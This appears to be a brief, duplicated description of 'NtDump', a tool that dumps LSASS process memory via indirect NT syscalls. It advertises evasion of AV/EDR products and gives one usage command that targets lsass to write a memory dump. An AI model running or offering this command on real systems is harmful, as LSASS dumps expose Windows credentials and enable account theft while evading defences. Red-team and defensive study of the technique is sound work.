LSASS process dumper with (mostly) NT API indirect syscalls. Currently undetected under many AV/EDR solutions.
.\NtDump.exe (Get-Process lsass).Id path_to_dumpLSASS process dumper with (mostly) NT API indirect syscalls. Currently undetected under many AV/EDR solutions.
.\NtDump.exe (Get-Process lsass).Id path_to_dump